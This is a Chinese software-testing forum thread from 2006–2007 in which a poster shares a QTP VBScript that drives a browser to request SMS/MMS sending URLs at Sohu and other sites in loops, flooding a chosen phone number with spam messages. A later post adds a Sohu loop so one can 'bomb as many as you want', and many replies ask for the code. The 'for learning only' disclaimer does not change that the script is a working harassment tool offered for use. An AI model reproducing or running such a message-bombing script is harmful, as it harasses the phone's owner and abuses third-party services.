51Testing软件测试论坛

标题: 我用QTP编写的一个恶意脚本－呵呵，仅供学习之用 [打印本页]

作者: yuandjing 时间: 2006-8-27 21:50
标题: 我用QTP编写的一个恶意脚本－呵呵，仅供学习之用
大家好，因为报了考QTP的CPE认证，所以最近在看QTP，今天花了一下午加晚上的时间写出来并修改了这段恶意脚本       对了，不是说月底考试吗？怎么我还没接到通知？？？？哪位DX知道的话告诉我
这段脚本执行起来的时候会往指定的手机发送大量的垃圾短消息，呵呵，仅供学习用，别故意恶搞人家啊，出了事我可不负责哦，我已经测试过了，我自己收到了好多垃圾消息啊
注意：
1.对象库自己加
2.要用遨游浏览器
程序如下：

SystemUtil.Run "D:\Program Files\Maxthon\Maxthon.exe","","d:\Program Files\Maxthon","open"    '打开遨游

Window("Maxthon Start Page").WinTab("SysTabControl32").DblClick 57,15                                              '关闭主页

Dim num,i
num=139xxxxxxxx
Dim temp1,temp2,temp3,tmp
temp1 = "http://a.3wawa.com/s/send.aspx?a=D501727CAD13C24071D6415CE6A1AD379EC7948505369AA0&id=13025&mobile="&num
temp2 = "http://mms.sohu.com/send/mosendit.combine.php?sendtype=1&UserNum="&num&"&id=141339&ref=undefined&ztid=&pid=&ToNum="&num&"&PHONE=2507&Content="
temp3 = "http://219.235.227.22/fxunion/interface/submit.php?usernumber="&num&"&mysmsid=10019&phone_name=标准品牌&phone_type=135&doCheck=1&picid=4594&type=2&path=http://img.mms.sohu.com/mms/1660/33/8533/4f3fc92d.mid&name=阳光总在风雨后&subid=&_show_page=1&product_id=1&operator_id=1&isnewad="

'msgbox temp1
'msgbox temp2
'msgbox temp3

'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'''''''''''用temp1轰炸
'Window("Maxthon Start Page_2").WinEdit("Edit").Set temp1
'Window("Maxthon Start Page_2").WinEdit("Edit").Type  micReturn
'wait(15)
'Dialog("Microsoft Internet Explorer").WinButton("确定").Click
'Window("三娃娃娱乐").WinTab("SysTabControl32").DblClick 77,13

i= (13030-13020)*2
msgbox "共轰炸"&i&"次"
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'''''''''''用tmp循环轰炸
For j=13020 to 13030
tmp = "http://a.3wawa.com/s/send.aspx?a=D501727CAD13C24071D6415CE6A1AD379EC7948505369AA0&id="&j&"&mobile="&num
Window("Maxthon Start Page_2").WinEdit("Edit").Set tmp
Window("Maxthon Start Page_2").WinEdit("Edit").Type  micReturn
wait(15)
Dialog("Microsoft Internet Explorer").WinButton("确定").Click
Window("三娃娃娱乐").WinTab("SysTabControl32").DblClick 77,13

If j=13020 or 13022or 13024 or 13026 or 13028 Then
   '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'''''''''''用temp2轰炸
Window("Maxthon Start Page_2").WinEdit("Edit").Set temp2
Window("Maxthon Start Page_2").WinEdit("Edit").Type  micReturn
wait(15)
Window("彩信发送").WinTab("SysTabControl32").Select "彩信发送"
Window("彩信发送").WinTab("SysTabControl32").DblClick 74,12

''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'''''''''''用temp3轰炸
Window("Maxthon Start Page_2").WinEdit("Edit").Set temp3
Window("Maxthon Start Page_2").WinEdit("Edit").Type  micReturn
wait(15)
Window("铃声图片下载").WinTab("SysTabControl32").Select "铃声图片下载"
Window("铃声图片下载").WinTab("SysTabControl32").DblClick 69,13
End If
Next

Window("Maxthon Start Page_2").Close          '关闭遨游

程序还是挺简单的，大家还是看得懂的吧
我遇到一些问题想求达人解答：
If j=13020 or 13022or 13024 or 13026 or 13028 Then
这句话我本来想写成 if j%2=0 then...
但是%是C的语法，在VB里我该怎么表达？

作者: lyscser 时间: 2006-8-28 08:26
厉害
看来你很有做坏事的前途
嘿嘿

作者: walker1020 时间: 2006-8-28 09:40
楼主是“歪才”！哈哈！呵呵！嘻嘻！

作者: QA_BAY 时间: 2006-8-28 10:10
楼主很有头脑吗?(坏主意一定多多)

作者: sinpa 时间: 2006-8-28 10:17
标题: 哈哈

原帖由 yuandjing 于 2006-8-27 21:50 发表
大家好，因为报了考QTP的CPE认证，所以最近在看QTP，今天花了一下午加晚上的时间写出来并修改了这段恶意脚本对了，不是说月底考试吗？怎么我还没接到通知？？？？哪位DX知道的话告诉我
这段脚本执行起来 ...

我想你的那个小问题是否这样啊
If j mod 2 = 0 Then

End If

作者: yuandjing 时间: 2006-8-28 10:37
哦，谢谢sinpa 了，我以前没学过VB，对语法还不太好，谢啦

作者: yuandjing 时间: 2006-8-28 10:40
我今天又针对搜狐的漏洞写了一段脚本
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'''''''''用搜狐漏洞连续炸
For sohu=100477 to 100487
temp = "http://mms.sohu.com/send/mosendit.combine.php?sendtype=1&UserNum="&num&"&id="&sohu&"&ref=undefined&ztid=&pid=&ToNum=13919119191&PHONE=2507&Content="
Window("Maxthon Start Page_2").WinEdit("Edit").Set temp
Window("Maxthon Start Page_2").WinEdit("Edit").Type micReturn
wait(7)
Window("彩信发送").WinTab("SysTabControl32").Select "彩信发送"
Window("彩信发送").WinTab("SysTabControl32").DblClick 74,12
Next

只要吧“sohu”的数值改一改，想炸多少就炸多少，哈哈，不过经研究发现最好把wait的值可以再改大一点

作者: yuandjing 时间: 2006-8-28 10:44
哦，sorry
temp = "http://mms.sohu.com/send/mosendit.combine.php?sendtype=1&UserNum="&num&"&id="&sohu&"&ref=undefined&ztid=&pid=&ToNum="&num&"&PHONE=2507&Content="

作者: xulei8823873 时间: 2006-8-28 11:11
标题: 思考
其实这里只是用了QTP能自动执行的原理而已,我想啊,估计一些密码破译软件也是用的是qtp自动执行的原理．不停的用反复而已

作者: guyu_susa 时间: 2006-8-28 11:57
标题: j mod 2
应该是用mod

作者: QA_BAY 时间: 2006-8-28 11:57

原帖由 xulei8823873 于 2006-8-28 11:11 发表
其实这里只是用了QTP能自动执行的原理而已,我想啊,估计一些密码破译软件也是用的是qtp自动执行的原理．不停的用反复而已

密码破译软件没有那么简单,有时间找本密码学看看.挺有意思的!

作者: yuandjing 时间: 2006-8-28 21:13

原帖由 QA_BAY 于 2006-8-28 11:57 发表

密码破译软件没有那么简单,有时间找本密码学看看.挺有意思的!

对啊,上次我们国家的大学生把美国的哈希码也破译了,厉害啊

作者: walker1020 时间: 2006-8-29 10:08

原帖由 yuandjing 于 2006-8-28 21:13 发表

对啊,上次我们国家的大学生把美国的哈希码也破译了,厉害啊

我怎么不知道？请问关于这则消息在什么网站上有介绍？我用Google搜索怎么没有找到？能否告诉我一个这则消息的网址？谢谢！

作者: liuliu022004 时间: 2006-8-29 17:23
我想试试这个程序，可是总出现这个错误。帮忙看看什么问题。
我已经把Maxthon Start Page和SysTabControl32 加到Object Repository.

作者: liuliu022004 时间: 2006-8-29 17:26
好难啊，总是出问题，还得学习语言。高手们给一些你们录制好的看看吧：P

作者: yuandjing 时间: 2006-8-29 22:43

原帖由 walker1020 于 2006-8-29 10:08 发表

我怎么不知道？请问关于这则消息在什么网站上有介绍？我用Google搜索怎么没有找到？能否告诉我一个这则消息的网址？谢谢！

我记得是去年还是前年的事吧，是南方的哪个大学的研究生团队破解的

作者: yuandjing 时间: 2006-8-29 22:45

原帖由 liuliu022004 于 2006-8-29 17:23 发表
我想试试这个程序，可是总出现这个错误。帮忙看看什么问题。
我已经把Maxthon Start Page和SysTabControl32 加到Object Repository.

我把整个QTP包都上传上来试试

作者: yuandjing 时间: 2006-8-29 22:54

原帖由 liuliu022004 于 2006-8-29 17:26 发表
好难啊，总是出问题，还得学习语言。高手们给一些你们录制好的看看吧：P

你解压后直接用QTP打开就可以了，如果你的遨游不是装在d:\program files下的话你改一下代码里的程序路径就可以了
呵呵，你可以先拿自己的手机试试看吧
把别人炸死了我可不负责哦

唉，源码2.48M，大于2M了，传不上来，你发个邮箱吧，我有空发给你

[ 本帖最后由 yuandjing 于 2006-8-29 23:01 编辑 ]

作者: walker1020 时间: 2006-8-29 23:09
标题: 给 yuandjing 的建议
你把源码用 WinRAR 分成几个部分压缩后传上来吧。这样别人也能看到你的源码。

作者: liuliu022004 时间: 2006-8-31 09:43
呵呵，我也不敢用别人的手机试，怕阿。
还有一个问题，run时总是会连IE一起打开，有没有解决办法？

liuliu022004@163.com

作者: mstiunicon 时间: 2006-8-31 11:42
看到楼主的代码，没有出现Browser（）...，是用Application方式录制生成的脚本么？
说说是怎么写的？
我现在的QTP不能识别Web对象，只能识别Windows对象，郁闷啊。

作者: ljitry 时间: 2006-8-31 13:35
我虽然ＱＱ上叫坏人，但想想楼主比我还要坏一些！！！

作者: yuandjing 时间: 2006-9-3 18:40

原帖由 mstiunicon 于 2006-8-31 11:42 发表
看到楼主的代码，没有出现Browser（）...，是用Application方式录制生成的脚本么？
说说是怎么写的？
我现在的QTP不能识别Web对象，只能识别Windows对象，郁闷啊。

对，我是用win32的方法录制的

作者: yuandjing 时间: 2006-9-3 18:43

原帖由 ljitry 于 2006-8-31 13:35 发表
我虽然ＱＱ上叫坏人，但想想楼主比我还要坏一些！！！

呵呵

作者: yuandjing 时间: 2006-9-3 18:44

原帖由 liuliu022004 于 2006-8-31 09:43 发表
呵呵，我也不敢用别人的手机试，怕阿。
还有一个问题，run时总是会连IE一起打开，有没有解决办法？

liuliu022004@163.com

我已经发给你了

作者: yuandjing 时间: 2006-9-3 18:49

原帖由 walker1020 于 2006-8-29 23:09 发表
你把源码用 WinRAR 分成几个部分压缩后传上来吧。这样别人也能看到你的源码。

老大，分几个部分不行，action1压缩一下还是超过2M，不能再分解了，否则就散架了

作者: winder238 时间: 2006-9-3 21:06
就楼主这水平还CPE
晕死

作者: walker1020 时间: 2006-9-4 09:27
标题: To yuandjing

原帖由 yuandjing 于 2006-9-3 18:49 发表

老大，分几个部分不行，action1压缩一下还是超过2M，不能再分解了，否则就散架了

看来你是没有用过WinRAR的这个分成几个部分压缩的功能呀。你问一下你的同事，你怎么样操作可以把你说的这个Action 分成几个部分压缩后传上来。如果还是没有人知道怎么操作，我再给你发送短信告诉你这个操作吧。

作者: ljitry 时间: 2006-9-7 18:00
玩了几下，挺好玩的！！！不过觉得技术含量少了点，版主，下次来点技术含量高点的！！！！^_^我顶～～～！

作者: walker1020 时间: 2006-9-7 19:26
3721---流氓软件的代名词---的创始人周鸿祎都推出了反流氓软件安全卫士360。我想，咱们也不要去开发类似流氓软件的东西吧。把心思用在歪门邪道上，总不是一件好事情吧。人家周鸿祎都改邪归正，放下屠刀、立地成佛了，楼主却在...
关于周鸿祎具体报道，请链接 http://net.chinabyte.com/321/2516321.shtml

作者: ljitry 时间: 2006-9-8 12:48
有意思！！！！呵呵

作者: xjmen 时间: 2006-9-8 17:58
把你的教本发给你 sohu的测试的吧呵呵

作者: jacky9947 时间: 2007-3-22 19:27
楼主太有才了

作者: kevin_swpi 时间: 2007-3-23 09:52
sdlkfj5
LZ是参照了C语言的代码?

呵呵
还是多厉害的
顶一个
给我发一分代码
kevin_swpi@163.com

谢谢咯

作者: MarsNoNo 时间: 2007-8-13 02:47
给我发一份吧，LZ！
archsatan@gmail.com

作者: wtucel 时间: 2007-8-13 09:13
其实就是利用数据库的溢出漏洞,用链接的方式提交溢出参数而已.最原始的漏洞了,现在这个漏洞很少见了,稍微新点的网站都用webservice了.楼主这样做其实很笨啊,还不如直接用LR,比你这运行快多了.一下就拒绝服务了.

作者: 秋之韵 时间: 2007-8-13 15:56
楼主有没有QQ啊,我想加你!

作者: yaojichang 时间: 2007-8-13 16:34
标题: 回复 #1 yuandjing 的帖子
楼主有没有QQ啊,我想加你!

作者: chengshilangren 时间: 2007-8-13 16:42

原帖由 yuandjing 于 2006-8-28 21:13 发表

对啊,上次我们国家的大学生把美国的哈希码也破译了,厉害啊

这么强？？

作者: zhangj8826 时间: 2007-8-15 10:31
强，搂主，你是我的偶像

作者: zlfy1982 时间: 2007-8-15 17:05
有空了也给偶发一个吧!
我的邮箱是:zlfy1982@126.com

作者: bobile 时间: 2007-8-15 17:45
这么强呀

作者: bobile 时间: 2007-8-15 17:45
高手

作者: 423799223 时间: 2007-8-16 08:31
楼主真是大有前途

作者: xiaoyaoke 时间: 2007-8-16 09:22
这个都能想出来，楼主厉害啊，呵呵

作者: Lola1123 时间: 2007-8-16 10:21
标题: 我要一份

原帖由 yuandjing 于 2006-8-29 22:54 发表

你解压后直接用QTP打开就可以了，如果你的遨游不是装在d:\program files下的话你改一下代码里的程序路径就可以了
呵呵，你可以先拿自己的手机试试看吧
把别人炸死了我可不负责哦

唉，源码2.48M，大于2M了 ...

给我一份吧，邮箱是lola1229@eyou.com谢谢你哦，越快越好，我等着用哦

作者: Lola1123 时间: 2007-8-16 10:23
标题: 回复 #1 yuandjing 的帖子
用IE可不可以？？？？

作者: haiqin 时间: 2007-8-16 11:07
附件
2006-8-29 17:23
1.JPG (17.78 KB)
为什么我在运行时，出不了上面的　RUN　ERROR　对话框啊，我只能被迫结束，我的上面只有　OK　HELP　和　DETAILS啊，为这个我都快急死了，我的MSN是wanghaiqin705@hotmail.com，有信息一定要通过我sdlkfj9

作者: windfly1314 时间: 2007-8-16 17:48
如果楼主看到，请也给我一份。我自学中，谢谢!wulh@cotel.com.cn

作者: yuandjing 时间: 2007-8-18 14:49

原帖由 wtucel 于 2007-8-13 09:13 发表
其实就是利用数据库的溢出漏洞,用链接的方式提交溢出参数而已.最原始的漏洞了,现在这个漏洞很少见了,稍微新点的网站都用webservice了.楼主这样做其实很笨啊,还不如直接用LR,比你这运行快多了.一下就拒绝服务了.

呵呵,用loadrunner刚跑5~6个vu就铁定被层层路由器\防火墙之类的东西拦在门外了
呵呵,这个根本不是什么溢出漏洞,我的链接字符串远没有能让SQL溢出
而是sohu的这个网页编的比较考虑不周,电话号码的requst是用不加密的明文在浏览器上传送,很容易被利用,恰巧QTP是最好的实现利用这个漏洞的工具,我就粗手偶得了~~

作者: yuandjing 时间: 2007-8-18 14:58
想不到我一年前的代码还能给你们给翻出来,呵呵,确实感到比较意外
这段代码确实没有什么技术含量,只是一时的突发奇想,我觉得做测试的就是处处要留个心眼,.
开发人员的思路可能是走一条大大的直道,而我们测试的是以这条直道为主线,每个分岔都要走走逛逛想想 :)
留下E-MAIL的我都发了邮件过去
其他想拿这段代码玩玩的我放在我的空间了:
http://yuandjing.ys168.com/
但是不要做坏事哦~~
我QQ和MSN都是几百年不上的,我留个我的邮箱吧: yuandjing.shnu@yahoo.com.cn 愿广结天下豪杰为友

作者: yuandjing 时间: 2007-8-18 15:01

原帖由 haiqin 于 2007-8-16 11:07 发表
附件
2006-8-29 17:23
1.JPG (17.78 KB)
为什么我在运行时，出不了上面的　RUN　ERROR　对话框啊，我只能被迫结束，我的上面只有　OK　HELP　和　DETAILS啊，为这个我都快急死了，我的MSN是wanghaiqin70 ...

兄台,我觉得你知道了这个原理,完全可以自己编写一下这段脚本,一定比拿我的脚本调试更快

欢迎光临 51Testing软件测试论坛 (http://bbs.51testing.com/)